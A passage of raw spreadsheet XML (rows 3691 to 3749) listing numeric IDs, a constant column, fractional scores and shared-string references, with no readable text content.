      </c>
      <c r="G3691" t="s">
        <v>7300</v>
      </c>
      <c r="H3691" t="s">
        <v>7301</v>
      </c>
    </row>
    <row r="3692" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3692" s="1">
        <v>3690</v>
      </c>
      <c r="B3692">
        <v>1255</v>
      </c>
      <c r="C3692">
        <v>1255</v>
      </c>
      <c r="D3692">
        <v>2</v>
      </c>
      <c r="E3692">
        <v>0.8531000018119812</v>
      </c>
      <c r="F3692" t="s">
        <v>5592</v>
      </c>
      <c r="G3692" t="s">
        <v>7302</v>
      </c>
      <c r="H3692" t="s">
        <v>7303</v>
      </c>
    </row>
    <row r="3693" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3693" s="1">
        <v>3691</v>
      </c>
      <c r="B3693">
        <v>1257</v>
      </c>
      <c r="C3693">
        <v>1257</v>
      </c>
      <c r="D3693">
        <v>2</v>
      </c>
      <c r="E3693">
        <v>0.69179999828338623</v>
      </c>
      <c r="F3693" t="s">
        <v>5592</v>
      </c>
      <c r="G3693" t="s">
        <v>7304</v>
      </c>
      <c r="H3693" t="s">
        <v>7305</v>
      </c>
    </row>
    <row r="3694" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3694" s="1">
        <v>3692</v>
      </c>
      <c r="B3694">
        <v>1258</v>
      </c>
      <c r="C3694">
        <v>1258</v>
      </c>
      <c r="D3694">
        <v>2</v>
      </c>
      <c r="E3694">
        <v>0.99500000476837158</v>
      </c>
      <c r="F3694" t="s">
        <v>5592</v>
      </c>
      <c r="G3694" t="s">
        <v>7306</v>
      </c>
      <c r="H3694" t="s">
        <v>7307</v>
      </c>
    </row>
    <row r="3695" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3695" s="1">
        <v>3693</v>
      </c>
      <c r="B3695">
        <v>1259</v>
      </c>
      <c r="C3695">
        <v>1259</v>
      </c>
      <c r="D3695">
        <v>2</v>
      </c>
      <c r="E3695">
        <v>0.85240000486373901</v>
      </c>
      <c r="F3695" t="s">
        <v>5592</v>
      </c>
      <c r="G3695" t="s">
        <v>7308</v>
      </c>
      <c r="H3695" t="s">
        <v>7309</v>
      </c>
    </row>
    <row r="3696" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3696" s="1">
        <v>3694</v>
      </c>
      <c r="B3696">
        <v>1260</v>
      </c>
      <c r="C3696">
        <v>1260</v>
      </c>
      <c r="D3696">
        <v>2</v>
      </c>
      <c r="E3696">
        <v>0.80519998073577881</v>
      </c>
      <c r="F3696" t="s">
        <v>5592</v>
      </c>
      <c r="G3696" t="s">
        <v>7310</v>
      </c>
      <c r="H3696" t="s">
        <v>7311</v>
      </c>
    </row>
    <row r="3697" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3697" s="1">
        <v>3695</v>
      </c>
      <c r="B3697">
        <v>1261</v>
      </c>
      <c r="C3697">
        <v>1261</v>
      </c>
      <c r="D3697">
        <v>2</v>
      </c>
      <c r="E3697">
        <v>0.95420002937316895</v>
      </c>
      <c r="F3697" t="s">
        <v>5592</v>
      </c>
      <c r="G3697" t="s">
        <v>7312</v>
      </c>
      <c r="H3697" t="s">
        <v>7313</v>
      </c>
    </row>
    <row r="3698" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3698" s="1">
        <v>3696</v>
      </c>
      <c r="B3698">
        <v>1262</v>
      </c>
      <c r="C3698">
        <v>1262</v>
      </c>
      <c r="D3698">
        <v>2</v>
      </c>
      <c r="E3698">
        <v>0.99059998989105225</v>
      </c>
      <c r="F3698" t="s">
        <v>5592</v>
      </c>
      <c r="G3698" t="s">
        <v>7314</v>
      </c>
      <c r="H3698" t="s">
        <v>7315</v>
      </c>
    </row>
    <row r="3699" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3699" s="1">
        <v>3697</v>
      </c>
      <c r="B3699">
        <v>1358</v>
      </c>
      <c r="C3699">
        <v>1358</v>
      </c>
      <c r="D3699">
        <v>2</v>
      </c>
      <c r="E3699">
        <v>0.99819999933242798</v>
      </c>
      <c r="F3699" t="s">
        <v>5592</v>
      </c>
      <c r="G3699" t="s">
        <v>7316</v>
      </c>
      <c r="H3699" t="s">
        <v>7317</v>
      </c>
    </row>
    <row r="3700" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3700" s="1">
        <v>3698</v>
      </c>
      <c r="B3700">
        <v>1263</v>
      </c>
      <c r="C3700">
        <v>1263</v>
      </c>
      <c r="D3700">
        <v>2</v>
      </c>
      <c r="E3700">
        <v>0.55650001764297485</v>
      </c>
      <c r="F3700" t="s">
        <v>5592</v>
      </c>
      <c r="G3700" t="s">
        <v>7318</v>
      </c>
      <c r="H3700" t="s">
        <v>7319</v>
      </c>
    </row>
    <row r="3701" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3701" s="1">
        <v>3699</v>
      </c>
      <c r="B3701">
        <v>7338</v>
      </c>
      <c r="C3701">
        <v>7338</v>
      </c>
      <c r="D3701">
        <v>2</v>
      </c>
      <c r="E3701">
        <v>0.55949997901916504</v>
      </c>
      <c r="F3701" t="s">
        <v>5592</v>
      </c>
      <c r="G3701" t="s">
        <v>7320</v>
      </c>
      <c r="H3701" t="s">
        <v>7321</v>
      </c>
    </row>
    <row r="3702" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3702" s="1">
        <v>3700</v>
      </c>
      <c r="B3702">
        <v>7336</v>
      </c>
      <c r="C3702">
        <v>7336</v>
      </c>
      <c r="D3702">
        <v>2</v>
      </c>
      <c r="E3702">
        <v>0.99870002269744873</v>
      </c>
      <c r="F3702" t="s">
        <v>5592</v>
      </c>
      <c r="G3702" t="s">
        <v>7322</v>
      </c>
      <c r="H3702" t="s">
        <v>7323</v>
      </c>
    </row>
    <row r="3703" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3703" s="1">
        <v>3701</v>
      </c>
      <c r="B3703">
        <v>7334</v>
      </c>
      <c r="C3703">
        <v>7334</v>
      </c>
      <c r="D3703">
        <v>2</v>
      </c>
      <c r="E3703">
        <v>0.99260002374649048</v>
      </c>
      <c r="F3703" t="s">
        <v>5592</v>
      </c>
      <c r="G3703" t="s">
        <v>7324</v>
      </c>
      <c r="H3703" t="s">
        <v>7325</v>
      </c>
    </row>
    <row r="3704" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3704" s="1">
        <v>3702</v>
      </c>
      <c r="B3704">
        <v>7333</v>
      </c>
      <c r="C3704">
        <v>7333</v>
      </c>
      <c r="D3704">
        <v>2</v>
      </c>
      <c r="E3704">
        <v>0.98930001258850098</v>
      </c>
      <c r="F3704" t="s">
        <v>5592</v>
      </c>
      <c r="G3704" t="s">
        <v>7326</v>
      </c>
      <c r="H3704" t="s">
        <v>7327</v>
      </c>
    </row>
    <row r="3705" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3705" s="1">
        <v>3703</v>
      </c>
      <c r="B3705">
        <v>7330</v>
      </c>
      <c r="C3705">
        <v>7330</v>
      </c>
      <c r="D3705">
        <v>2</v>
      </c>
      <c r="E3705">
        <v>0.61000001430511475</v>
      </c>
      <c r="F3705" t="s">
        <v>5592</v>
      </c>
      <c r="G3705" t="s">
        <v>7328</v>
      </c>
      <c r="H3705" t="s">
        <v>7329</v>
      </c>
    </row>
    <row r="3706" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3706" s="1">
        <v>3704</v>
      </c>
      <c r="B3706">
        <v>7328</v>
      </c>
      <c r="C3706">
        <v>7328</v>
      </c>
      <c r="D3706">
        <v>2</v>
      </c>
      <c r="E3706">
        <v>0.5130000114440918</v>
      </c>
      <c r="F3706" t="s">
        <v>5592</v>
      </c>
      <c r="G3706" t="s">
        <v>7330</v>
      </c>
      <c r="H3706" t="s">
        <v>7331</v>
      </c>
    </row>
    <row r="3707" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3707" s="1">
        <v>3705</v>
      </c>
      <c r="B3707">
        <v>7327</v>
      </c>
      <c r="C3707">
        <v>7327</v>
      </c>
      <c r="D3707">
        <v>2</v>
      </c>
      <c r="E3707">
        <v>0.57770001888275146</v>
      </c>
      <c r="F3707" t="s">
        <v>5592</v>
      </c>
      <c r="G3707" t="s">
        <v>7332</v>
      </c>
      <c r="H3707" t="s">
        <v>7333</v>
      </c>
    </row>
    <row r="3708" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3708" s="1">
        <v>3706</v>
      </c>
      <c r="B3708">
        <v>1287</v>
      </c>
      <c r="C3708">
        <v>1287</v>
      </c>
      <c r="D3708">
        <v>2</v>
      </c>
      <c r="E3708">
        <v>0.99949997663497925</v>
      </c>
      <c r="F3708" t="s">
        <v>5592</v>
      </c>
      <c r="G3708" t="s">
        <v>7334</v>
      </c>
      <c r="H3708" t="s">
        <v>7335</v>
      </c>
    </row>
    <row r="3709" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3709" s="1">
        <v>3707</v>
      </c>
      <c r="B3709">
        <v>1299</v>
      </c>
      <c r="C3709">
        <v>1299</v>
      </c>
      <c r="D3709">
        <v>2</v>
      </c>
      <c r="E3709">
        <v>0.72630000114440918</v>
      </c>
      <c r="F3709" t="s">
        <v>5592</v>
      </c>
      <c r="G3709" t="s">
        <v>7336</v>
      </c>
      <c r="H3709" t="s">
        <v>7337</v>
      </c>
    </row>
    <row r="3710" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3710" s="1">
        <v>3708</v>
      </c>
      <c r="B3710">
        <v>7316</v>
      </c>
      <c r="C3710">
        <v>7316</v>
      </c>
      <c r="D3710">
        <v>2</v>
      </c>
      <c r="E3710">
        <v>0.92229998111724854</v>
      </c>
      <c r="F3710" t="s">
        <v>5592</v>
      </c>
      <c r="G3710" t="s">
        <v>7338</v>
      </c>
      <c r="H3710" t="s">
        <v>7339</v>
      </c>
    </row>
    <row r="3711" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3711" s="1">
        <v>3709</v>
      </c>
      <c r="B3711">
        <v>1265</v>
      </c>
      <c r="C3711">
        <v>1265</v>
      </c>
      <c r="D3711">
        <v>2</v>
      </c>
      <c r="E3711">
        <v>0.49849998950958252</v>
      </c>
      <c r="F3711" t="s">
        <v>5592</v>
      </c>
      <c r="G3711" t="s">
        <v>7340</v>
      </c>
      <c r="H3711" t="s">
        <v>7341</v>
      </c>
    </row>
    <row r="3712" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3712" s="1">
        <v>3710</v>
      </c>
      <c r="B3712">
        <v>1248</v>
      </c>
      <c r="C3712">
        <v>1248</v>
      </c>
      <c r="D3712">
        <v>2</v>
      </c>
      <c r="E3712">
        <v>0.59039998054504395</v>
      </c>
      <c r="F3712" t="s">
        <v>5592</v>
      </c>
      <c r="G3712" t="s">
        <v>7342</v>
      </c>
      <c r="H3712" t="s">
        <v>7343</v>
      </c>
    </row>
    <row r="3713" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3713" s="1">
        <v>3711</v>
      </c>
      <c r="B3713">
        <v>1359</v>
      </c>
      <c r="C3713">
        <v>1359</v>
      </c>
      <c r="D3713">
        <v>2</v>
      </c>
      <c r="E3713">
        <v>0.93730002641677856</v>
      </c>
      <c r="F3713" t="s">
        <v>5592</v>
      </c>
      <c r="G3713" t="s">
        <v>7344</v>
      </c>
      <c r="H3713" t="s">
        <v>7345</v>
      </c>
    </row>
    <row r="3714" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3714" s="1">
        <v>3712</v>
      </c>
      <c r="B3714">
        <v>7295</v>
      </c>
      <c r="C3714">
        <v>7295</v>
      </c>
      <c r="D3714">
        <v>2</v>
      </c>
      <c r="E3714">
        <v>0.97960001230239868</v>
      </c>
      <c r="F3714" t="s">
        <v>5592</v>
      </c>
      <c r="G3714" t="s">
        <v>7346</v>
      </c>
      <c r="H3714" t="s">
        <v>7347</v>
      </c>
    </row>
    <row r="3715" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3715" s="1">
        <v>3713</v>
      </c>
      <c r="B3715">
        <v>1423</v>
      </c>
      <c r="C3715">
        <v>1423</v>
      </c>
      <c r="D3715">
        <v>2</v>
      </c>
      <c r="E3715">
        <v>0.51560002565383911</v>
      </c>
      <c r="F3715" t="s">
        <v>5592</v>
      </c>
      <c r="G3715" t="s">
        <v>7348</v>
      </c>
      <c r="H3715" t="s">
        <v>7349</v>
      </c>
    </row>
    <row r="3716" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3716" s="1">
        <v>3714</v>
      </c>
      <c r="B3716">
        <v>1424</v>
      </c>
      <c r="C3716">
        <v>1424</v>
      </c>
      <c r="D3716">
        <v>2</v>
      </c>
      <c r="E3716">
        <v>0.62529999017715454</v>
      </c>
      <c r="F3716" t="s">
        <v>5592</v>
      </c>
      <c r="G3716" t="s">
        <v>7350</v>
      </c>
      <c r="H3716" t="s">
        <v>7351</v>
      </c>
    </row>
    <row r="3717" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3717" s="1">
        <v>3715</v>
      </c>
      <c r="B3717">
        <v>1426</v>
      </c>
      <c r="C3717">
        <v>1426</v>
      </c>
      <c r="D3717">
        <v>2</v>
      </c>
      <c r="E3717">
        <v>0.82819998264312744</v>
      </c>
      <c r="F3717" t="s">
        <v>5592</v>
      </c>
      <c r="G3717" t="s">
        <v>7352</v>
      </c>
      <c r="H3717" t="s">
        <v>7353</v>
      </c>
    </row>
    <row r="3718" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3718" s="1">
        <v>3716</v>
      </c>
      <c r="B3718">
        <v>7278</v>
      </c>
      <c r="C3718">
        <v>7278</v>
      </c>
      <c r="D3718">
        <v>2</v>
      </c>
      <c r="E3718">
        <v>0.89480000734329224</v>
      </c>
      <c r="F3718" t="s">
        <v>5592</v>
      </c>
      <c r="G3718" t="s">
        <v>7354</v>
      </c>
      <c r="H3718" t="s">
        <v>7355</v>
      </c>
    </row>
    <row r="3719" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3719" s="1">
        <v>3717</v>
      </c>
      <c r="B3719">
        <v>1433</v>
      </c>
      <c r="C3719">
        <v>1433</v>
      </c>
      <c r="D3719">
        <v>2</v>
      </c>
      <c r="E3719">
        <v>0.56730002164840698</v>
      </c>
      <c r="F3719" t="s">
        <v>5592</v>
      </c>
      <c r="G3719" t="s">
        <v>7356</v>
      </c>
      <c r="H3719" t="s">
        <v>7357</v>
      </c>
    </row>
    <row r="3720" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3720" s="1">
        <v>3718</v>
      </c>
      <c r="B3720">
        <v>7277</v>
      </c>
      <c r="C3720">
        <v>7277</v>
      </c>
      <c r="D3720">
        <v>2</v>
      </c>
      <c r="E3720">
        <v>0.99690002202987671</v>
      </c>
      <c r="F3720" t="s">
        <v>5592</v>
      </c>
      <c r="G3720" t="s">
        <v>7358</v>
      </c>
      <c r="H3720" t="s">
        <v>7359</v>
      </c>
    </row>
    <row r="3721" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3721" s="1">
        <v>3719</v>
      </c>
      <c r="B3721">
        <v>7274</v>
      </c>
      <c r="C3721">
        <v>7274</v>
      </c>
      <c r="D3721">
        <v>2</v>
      </c>
      <c r="E3721">
        <v>0.79930001497268677</v>
      </c>
      <c r="F3721" t="s">
        <v>5592</v>
      </c>
      <c r="G3721" t="s">
        <v>7360</v>
      </c>
      <c r="H3721" t="s">
        <v>7361</v>
      </c>
    </row>
    <row r="3722" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3722" s="1">
        <v>3720</v>
      </c>
      <c r="B3722">
        <v>1441</v>
      </c>
      <c r="C3722">
        <v>1441</v>
      </c>
      <c r="D3722">
        <v>2</v>
      </c>
      <c r="E3722">
        <v>0.80419999361038208</v>
      </c>
      <c r="F3722" t="s">
        <v>5592</v>
      </c>
      <c r="G3722" t="s">
        <v>7362</v>
      </c>
      <c r="H3722" t="s">
        <v>7363</v>
      </c>
    </row>
    <row r="3723" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3723" s="1">
        <v>3721</v>
      </c>
      <c r="B3723">
        <v>1446</v>
      </c>
      <c r="C3723">
        <v>1446</v>
      </c>
      <c r="D3723">
        <v>2</v>
      </c>
      <c r="E3723">
        <v>0.91579997539520264</v>
      </c>
      <c r="F3723" t="s">
        <v>5592</v>
      </c>
      <c r="G3723" t="s">
        <v>7364</v>
      </c>
      <c r="H3723" t="s">
        <v>7365</v>
      </c>
    </row>
    <row r="3724" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3724" s="1">
        <v>3722</v>
      </c>
      <c r="B3724">
        <v>7267</v>
      </c>
      <c r="C3724">
        <v>7267</v>
      </c>
      <c r="D3724">
        <v>2</v>
      </c>
      <c r="E3724">
        <v>0.99379998445510864</v>
      </c>
      <c r="F3724" t="s">
        <v>5592</v>
      </c>
      <c r="G3724" t="s">
        <v>7366</v>
      </c>
      <c r="H3724" t="s">
        <v>7367</v>
      </c>
    </row>
    <row r="3725" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3725" s="1">
        <v>3723</v>
      </c>
      <c r="B3725">
        <v>1454</v>
      </c>
      <c r="C3725">
        <v>1454</v>
      </c>
      <c r="D3725">
        <v>2</v>
      </c>
      <c r="E3725">
        <v>0.85769999027252197</v>
      </c>
      <c r="F3725" t="s">
        <v>5592</v>
      </c>
      <c r="G3725" t="s">
        <v>7368</v>
      </c>
      <c r="H3725" t="s">
        <v>7369</v>
      </c>
    </row>
    <row r="3726" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3726" s="1">
        <v>3724</v>
      </c>
      <c r="B3726">
        <v>7266</v>
      </c>
      <c r="C3726">
        <v>7266</v>
      </c>
      <c r="D3726">
        <v>2</v>
      </c>
      <c r="E3726">
        <v>0.94359999895095825</v>
      </c>
      <c r="F3726" t="s">
        <v>5592</v>
      </c>
      <c r="G3726" t="s">
        <v>7370</v>
      </c>
      <c r="H3726" t="s">
        <v>7371</v>
      </c>
    </row>
    <row r="3727" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3727" s="1">
        <v>3725</v>
      </c>
      <c r="B3727">
        <v>1458</v>
      </c>
      <c r="C3727">
        <v>1458</v>
      </c>
      <c r="D3727">
        <v>2</v>
      </c>
      <c r="E3727">
        <v>0.875</v>
      </c>
      <c r="F3727" t="s">
        <v>5592</v>
      </c>
      <c r="G3727" t="s">
        <v>7372</v>
      </c>
      <c r="H3727" t="s">
        <v>7373</v>
      </c>
    </row>
    <row r="3728" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3728" s="1">
        <v>3726</v>
      </c>
      <c r="B3728">
        <v>1460</v>
      </c>
      <c r="C3728">
        <v>1460</v>
      </c>
      <c r="D3728">
        <v>2</v>
      </c>
      <c r="E3728">
        <v>0.57289999723434448</v>
      </c>
      <c r="F3728" t="s">
        <v>5592</v>
      </c>
      <c r="G3728" t="s">
        <v>7374</v>
      </c>
      <c r="H3728" t="s">
        <v>7375</v>
      </c>
    </row>
    <row r="3729" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3729" s="1">
        <v>3727</v>
      </c>
      <c r="B3729">
        <v>1461</v>
      </c>
      <c r="C3729">
        <v>1461</v>
      </c>
      <c r="D3729">
        <v>2</v>
      </c>
      <c r="E3729">
        <v>0.5788000226020813</v>
      </c>
      <c r="F3729" t="s">
        <v>5592</v>
      </c>
      <c r="G3729" t="s">
        <v>7376</v>
      </c>
      <c r="H3729" t="s">
        <v>7377</v>
      </c>
    </row>
    <row r="3730" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3730" s="1">
        <v>3728</v>
      </c>
      <c r="B3730">
        <v>7263</v>
      </c>
      <c r="C3730">
        <v>7263</v>
      </c>
      <c r="D3730">
        <v>2</v>
      </c>
      <c r="E3730">
        <v>0.62110000848770142</v>
      </c>
      <c r="F3730" t="s">
        <v>5592</v>
      </c>
      <c r="G3730" t="s">
        <v>7378</v>
      </c>
      <c r="H3730" t="s">
        <v>7379</v>
      </c>
    </row>
    <row r="3731" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3731" s="1">
        <v>3729</v>
      </c>
      <c r="B3731">
        <v>7262</v>
      </c>
      <c r="C3731">
        <v>7262</v>
      </c>
      <c r="D3731">
        <v>2</v>
      </c>
      <c r="E3731">
        <v>0.99599999189376831</v>
      </c>
      <c r="F3731" t="s">
        <v>5592</v>
      </c>
      <c r="G3731" t="s">
        <v>7380</v>
      </c>
      <c r="H3731" t="s">
        <v>7381</v>
      </c>
    </row>
    <row r="3732" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3732" s="1">
        <v>3730</v>
      </c>
      <c r="B3732">
        <v>1466</v>
      </c>
      <c r="C3732">
        <v>1466</v>
      </c>
      <c r="D3732">
        <v>2</v>
      </c>
      <c r="E3732">
        <v>0.94690001010894775</v>
      </c>
      <c r="F3732" t="s">
        <v>5592</v>
      </c>
      <c r="G3732" t="s">
        <v>7382</v>
      </c>
      <c r="H3732" t="s">
        <v>7383</v>
      </c>
    </row>
    <row r="3733" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3733" s="1">
        <v>3731</v>
      </c>
      <c r="B3733">
        <v>1471</v>
      </c>
      <c r="C3733">
        <v>1471</v>
      </c>
      <c r="D3733">
        <v>2</v>
      </c>
      <c r="E3733">
        <v>0.99819999933242798</v>
      </c>
      <c r="F3733" t="s">
        <v>5592</v>
      </c>
      <c r="G3733" t="s">
        <v>7384</v>
      </c>
      <c r="H3733" t="s">
        <v>7385</v>
      </c>
    </row>
    <row r="3734" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3734" s="1">
        <v>3732</v>
      </c>
      <c r="B3734">
        <v>7258</v>
      </c>
      <c r="C3734">
        <v>7258</v>
      </c>
      <c r="D3734">
        <v>2</v>
      </c>
      <c r="E3734">
        <v>0.99570000171661377</v>
      </c>
      <c r="F3734" t="s">
        <v>5592</v>
      </c>
      <c r="G3734" t="s">
        <v>7386</v>
      </c>
      <c r="H3734" t="s">
        <v>7387</v>
      </c>
    </row>
    <row r="3735" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3735" s="1">
        <v>3733</v>
      </c>
      <c r="B3735">
        <v>1482</v>
      </c>
      <c r="C3735">
        <v>1482</v>
      </c>
      <c r="D3735">
        <v>2</v>
      </c>
      <c r="E3735">
        <v>0.48309999704360962</v>
      </c>
      <c r="F3735" t="s">
        <v>5592</v>
      </c>
      <c r="G3735" t="s">
        <v>7388</v>
      </c>
      <c r="H3735" t="s">
        <v>7389</v>
      </c>
    </row>
    <row r="3736" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3736" s="1">
        <v>3734</v>
      </c>
      <c r="B3736">
        <v>1422</v>
      </c>
      <c r="C3736">
        <v>1422</v>
      </c>
      <c r="D3736">
        <v>2</v>
      </c>
      <c r="E3736">
        <v>0.82829999923706055</v>
      </c>
      <c r="F3736" t="s">
        <v>5592</v>
      </c>
      <c r="G3736" t="s">
        <v>7390</v>
      </c>
      <c r="H3736" t="s">
        <v>7353</v>
      </c>
    </row>
    <row r="3737" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3737" s="1">
        <v>3735</v>
      </c>
      <c r="B3737">
        <v>1413</v>
      </c>
      <c r="C3737">
        <v>1413</v>
      </c>
      <c r="D3737">
        <v>2</v>
      </c>
      <c r="E3737">
        <v>0.81190001964569092</v>
      </c>
      <c r="F3737" t="s">
        <v>5592</v>
      </c>
      <c r="G3737" t="s">
        <v>7391</v>
      </c>
      <c r="H3737" t="s">
        <v>7392</v>
      </c>
    </row>
    <row r="3738" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3738" s="1">
        <v>3736</v>
      </c>
      <c r="B3738">
        <v>1410</v>
      </c>
      <c r="C3738">
        <v>1410</v>
      </c>
      <c r="D3738">
        <v>2</v>
      </c>
      <c r="E3738">
        <v>0.91479998826980591</v>
      </c>
      <c r="F3738" t="s">
        <v>5592</v>
      </c>
      <c r="G3738" t="s">
        <v>7393</v>
      </c>
      <c r="H3738" t="s">
        <v>7394</v>
      </c>
    </row>
    <row r="3739" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3739" s="1">
        <v>3737</v>
      </c>
      <c r="B3739">
        <v>1409</v>
      </c>
      <c r="C3739">
        <v>1409</v>
      </c>
      <c r="D3739">
        <v>2</v>
      </c>
      <c r="E3739">
        <v>0.46200001239776611</v>
      </c>
      <c r="F3739" t="s">
        <v>5592</v>
      </c>
      <c r="G3739" t="s">
        <v>7395</v>
      </c>
      <c r="H3739" t="s">
        <v>7396</v>
      </c>
    </row>
    <row r="3740" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3740" s="1">
        <v>3738</v>
      </c>
      <c r="B3740">
        <v>1362</v>
      </c>
      <c r="C3740">
        <v>1362</v>
      </c>
      <c r="D3740">
        <v>2</v>
      </c>
      <c r="E3740">
        <v>0.81660002470016479</v>
      </c>
      <c r="F3740" t="s">
        <v>5592</v>
      </c>
      <c r="G3740" t="s">
        <v>7397</v>
      </c>
      <c r="H3740" t="s">
        <v>7398</v>
      </c>
    </row>
    <row r="3741" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3741" s="1">
        <v>3739</v>
      </c>
      <c r="B3741">
        <v>1363</v>
      </c>
      <c r="C3741">
        <v>1363</v>
      </c>
      <c r="D3741">
        <v>2</v>
      </c>
      <c r="E3741">
        <v>0.8564000129699707</v>
      </c>
      <c r="F3741" t="s">
        <v>5592</v>
      </c>
      <c r="G3741" t="s">
        <v>7399</v>
      </c>
      <c r="H3741" t="s">
        <v>7400</v>
      </c>
    </row>
    <row r="3742" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3742" s="1">
        <v>3740</v>
      </c>
      <c r="B3742">
        <v>7294</v>
      </c>
      <c r="C3742">
        <v>7294</v>
      </c>
      <c r="D3742">
        <v>2</v>
      </c>
      <c r="E3742">
        <v>0.98739999532699585</v>
      </c>
      <c r="F3742" t="s">
        <v>5592</v>
      </c>
      <c r="G3742" t="s">
        <v>7401</v>
      </c>
      <c r="H3742" t="s">
        <v>7402</v>
      </c>
    </row>
    <row r="3743" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3743" s="1">
        <v>3741</v>
      </c>
      <c r="B3743">
        <v>1365</v>
      </c>
      <c r="C3743">
        <v>1365</v>
      </c>
      <c r="D3743">
        <v>2</v>
      </c>
      <c r="E3743">
        <v>0.99750000238418579</v>
      </c>
      <c r="F3743" t="s">
        <v>5592</v>
      </c>
      <c r="G3743" t="s">
        <v>7403</v>
      </c>
      <c r="H3743" t="s">
        <v>7404</v>
      </c>
    </row>
    <row r="3744" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3744" s="1">
        <v>3742</v>
      </c>
      <c r="B3744">
        <v>1366</v>
      </c>
      <c r="C3744">
        <v>1366</v>
      </c>
      <c r="D3744">
        <v>2</v>
      </c>
      <c r="E3744">
        <v>0.99169999361038208</v>
      </c>
      <c r="F3744" t="s">
        <v>5592</v>
      </c>
      <c r="G3744" t="s">
        <v>7405</v>
      </c>
      <c r="H3744" t="s">
        <v>7406</v>
      </c>
    </row>
    <row r="3745" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3745" s="1">
        <v>3743</v>
      </c>
      <c r="B3745">
        <v>1367</v>
      </c>
      <c r="C3745">
        <v>1367</v>
      </c>
      <c r="D3745">
        <v>2</v>
      </c>
      <c r="E3745">
        <v>0.60199999809265137</v>
      </c>
      <c r="F3745" t="s">
        <v>5592</v>
      </c>
      <c r="G3745" t="s">
        <v>7407</v>
      </c>
      <c r="H3745" t="s">
        <v>7408</v>
      </c>
    </row>
    <row r="3746" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3746" s="1">
        <v>3744</v>
      </c>
      <c r="B3746">
        <v>1368</v>
      </c>
      <c r="C3746">
        <v>1368</v>
      </c>
      <c r="D3746">
        <v>2</v>
      </c>
      <c r="E3746">
        <v>0.9846000075340271</v>
      </c>
      <c r="F3746" t="s">
        <v>5592</v>
      </c>
      <c r="G3746" t="s">
        <v>7409</v>
      </c>
      <c r="H3746" t="s">
        <v>7410</v>
      </c>
    </row>
    <row r="3747" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3747" s="1">
        <v>3745</v>
      </c>
      <c r="B3747">
        <v>1369</v>
      </c>
      <c r="C3747">
        <v>1369</v>
      </c>
      <c r="D3747">
        <v>2</v>
      </c>
      <c r="E3747">
        <v>0.98110002279281616</v>
      </c>
      <c r="F3747" t="s">
        <v>5592</v>
      </c>
      <c r="G3747" t="s">
        <v>7411</v>
      </c>
      <c r="H3747" t="s">
        <v>7412</v>
      </c>
    </row>
    <row r="3748" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3748" s="1">
        <v>3746</v>
      </c>
      <c r="B3748">
        <v>7293</v>
      </c>
      <c r="C3748">
        <v>7293</v>
      </c>
      <c r="D3748">
        <v>2</v>
      </c>
      <c r="E3748">
        <v>0.99889999628067017</v>
      </c>
      <c r="F3748" t="s">
        <v>5592</v>
      </c>
      <c r="G3748" t="s">
        <v>7413</v>
      </c>
      <c r="H3748" t="s">
        <v>7414</v>
      </c>
    </row>
    <row r="3749" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3749" s="1">
        <v>3747</v>
      </c>
      <c r="B3749">
        <v>1372</v>
      </c>
      <c r="C3749">
        <v>1372</v>
      </c>
      <c r="D3749">
        <v>2</v>
      </c>
      <c r="E3749">
        <v>0.9966999888420105</v>
      </c>
      <c r="F3749" t="s">
        <v>5592</v>
      </c>
      <c r="G3749" t="s">
        <v>7415</v>
      </c>
      <c r="H3749" t="s">
        <v>7416</v>
      </c>
    </row>
    <row r="3750" spans="1:8" x14ac:dyDescent="0.45">
